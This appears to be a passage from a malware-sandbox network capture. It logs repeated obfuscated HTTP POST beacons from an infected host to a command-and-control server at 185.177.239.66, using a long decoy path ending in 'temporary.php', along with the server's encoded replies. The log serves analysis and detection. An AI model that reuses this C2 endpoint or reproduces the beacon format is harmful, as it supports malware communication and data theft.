                                                                                        Jan 8, 2025 18:09:25.406292915 CET2596OUTData Raw: 59 5e 46 5f 5e 5e 57 5b 5e 5c 50 55 50 5d 5a 5e 5a 59 5b 55 54 52 55 50 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: Y^F_^^W[^\PUP]Z^ZY[UTRUPTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9]>1)[%!4\'68[)9%Z$>$)0=.:R&-*S./%//9=.Y#,Z!7
                                                                                        Jan 8, 2025 18:09:25.752337933 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:25.882813931 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:25 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        51192.168.2.450058185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:26.013489008 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2592
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:26.359155893 CET2592OUTData Raw: 59 5e 46 5a 5b 5b 52 5d 5e 5c 50 55 50 59 5a 51 5a 52 5b 5b 54 55 55 5f 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: Y^FZ[[R]^\PUPYZQZR[[TUU_TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9])W>32_$5 Y(:!0=7*??U=.'%,<7'8/-.Y#,Z!
                                                                                        Jan 8, 2025 18:09:26.683640003 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:26.810686111 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:26 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        52192.168.2.450059185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:26.977443933 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:27.328634024 CET2596OUTData Raw: 5c 58 43 5d 5b 59 52 5a 5e 5c 50 55 50 5e 5a 58 5a 59 5b 5e 54 53 55 58 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \XC][YRZ^\PUP^ZXZY[^TSUXTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9]>1&'#$ *=$> U*/7)Q$6,/3'/'9.Y#,Z!
                                                                                        Jan 8, 2025 18:09:27.668800116 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:27.806440115 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:27 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        53192.168.2.450060185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:27.944159985 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:28.296596050 CET2596OUTData Raw: 5c 59 43 5a 5b 54 52 5f 5e 5c 50 55 50 50 5a 5e 5a 5b 5b 5e 54 52 55 59 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \YCZ[TR_^\PUPPZ^Z[[^TRUYTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9_*!-$!70$>1[%-#>'=.029<+'/?..Y#,Z!
                                                                                        Jan 8, 2025 18:09:29.491681099 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:29.491991043 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:28 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0
                                                                                        Jan 8, 2025 18:09:29.492002010 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:28 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0
                                                                                        Jan 8, 2025 18:09:29.492228031 CET225INHTTP/1.1 100 Continue
                                                                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 38 20 4a 61 6e 20 32 30 32 35 20 31 37 3a 30 39 3a 32 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Wed, 08 Jan 2025 17:09:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=Z@V0
                                                                                        Jan 8, 2025 18:09:29.492585897 CET225INHTTP/1.1 100 Continue
                                                                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 38 20 4a 61 6e 20 32 30 32 35 20 31 37 3a 30 39 3a 32 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Wed, 08 Jan 2025 17:09:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        54192.168.2.450061185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:29.614226103 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:29.968262911 CET2596OUTData Raw: 5c 5a 43 53 5e 58 57 51 5e 5c 50 55 50 5f 5a 5e 5a 5c 5b 55 54 55 55 5e 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \ZCS^XWQ^\PUP_Z^Z\[UTUU^TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:>!%17$'*)0#)Y?W=.&-S9< Z'/<[..Y#,Z!?
                                                                                        Jan 8, 2025 18:09:30.285806894 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:30.418586016 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:30 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        55192.168.2.450062185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:30.551202059 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:30.905896902 CET2596OUTData Raw: 5c 5d 46 5a 5b 5f 52 5c 5e 5c 50 55 50 5b 5a 59 5a 5f 5b 5e 54 52 55 51 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \]FZ[_R\^\PUP[ZYZ_[^TRUQTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9Y)W63T $0)_13[8V)?=0W-$#/-.Y#,Z!/
                                                                                        Jan 8, 2025 18:09:31.237360954 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:31.373687029 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:31 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        56192.168.2.450063185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:30.772617102 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2192
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:31.124538898 CET2192OUTData Raw: 5c 5d 43 52 5b 5f 57 5c 5e 5c 50 55 50 5a 5a 58 5a 5a 5b 5d 54 50 55 5a 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \]CR[_W\^\PUPZZXZZ[]TPUZTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9)W)Z%"\$5'(:.%.$S(,(*X"&>5,?<'?9.Y#,Z!+
                                                                                        Jan 8, 2025 18:09:31.455406904 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:31.590358019 CET349INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:31 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 39 38 0d 0a 0f 12 3a 07 31 38 31 5a 23 38 08 54 2d 3d 2c 13 26 3f 0b 5d 2a 0e 05 5b 3d 0d 2c 03 3c 3b 2c 1d 2b 3b 03 5d 27 05 2d 1f 21 3c 22 05 21 10 2c 5f 02 12 26 45 3d 22 0e 54 2a 59 27 1f 29 34 2d 1c 37 32 29 06 2a 20 31 0d 36 29 02 59 25 33 03 0d 27 57 37 55 3f 3d 24 06 3b 2e 21 1d 36 13 21 50 0c 12 23 0b 21 16 27 0d 36 3b 39 5c 29 38 36 5f 26 35 29 0e 31 39 2b 5b 23 0a 27 57 27 55 3b 09 24 28 38 55 33 01 20 02 26 39 20 50 2e 12 20 53 22 01 2d 53 0e 30 55 51 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 98:181Z#8T-=,&?]*[=,<;,+;]'-!<"!,_&E="T*Y')4-72)* 16)Y%3'W7U?=$;.!6!P#!'6;9\)86_&5)19+[#'W'U;$(8U3 &9 P. S"-S0UQ0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        57192.168.2.450064185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:31.534713984 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:31.890327930 CET2596OUTData Raw: 59 5b 46 5e 5e 5d 57 59 5e 5c 50 55 50 5b 5a 51 5a 5f 5b 55 54 51 55 50 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: Y[F^^]WY^\PUP[ZQZ_[UTQUPTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9])"1%20_'X>:!X3/>(*.*W'>:,,(_$/9=.Y#,Z!/
                                                                                        Jan 8, 2025 18:09:32.216546059 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:32.354458094 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:32 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        58192.168.2.450065185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:32.493668079 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:32.843327999 CET2596OUTData Raw: 5c 5a 43 5f 5e 5f 57 59 5e 5c 50 55 50 50 5a 59 5a 5e 5b 59 54 53 55 5d 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \ZC_^_WY^\PUPPZYZ^[YTSU]TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:)!-$18['0Y*5$-<*,')3*,,<Y0'--.Y#,Z!
                                                                                        Jan 8, 2025 18:09:33.177985907 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:33.310381889 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:33 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        59192.168.2.450066185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:33.469961882 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2584
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:33.913532972 CET2584OUTData Raw: 59 5a 46 5a 5e 5e 52 5a 5e 5c 50 55 50 59 5a 59 5a 52 5b 5d 54 5d 55 59 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: YZFZ^^RZ^\PUPYZYZR[]T]UYTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9^+1=32 $(>_)\3=U>0)2Q$[:V:??%/(_..Y#,Z!
                                                                                        Jan 8, 2025 18:09:34.152874947 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:34.302120924 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:34 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        60192.168.2.450067185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:34.454812050 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:34.812110901 CET2596OUTData Raw: 59 5f 43 5d 5e 58 52 58 5e 5c 50 55 50 58 5a 5b 5a 5e 5b 58 54 5d 55 5c 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: Y_C]^XRX^\PUPXZ[Z^[XT]U\TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9^*!_'#'/>=%-4S=<)X.Q3-T:?'?<[.-.Y#,Z!#
                                                                                        Jan 8, 2025 18:09:35.147608042 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:35.278747082 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:35 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
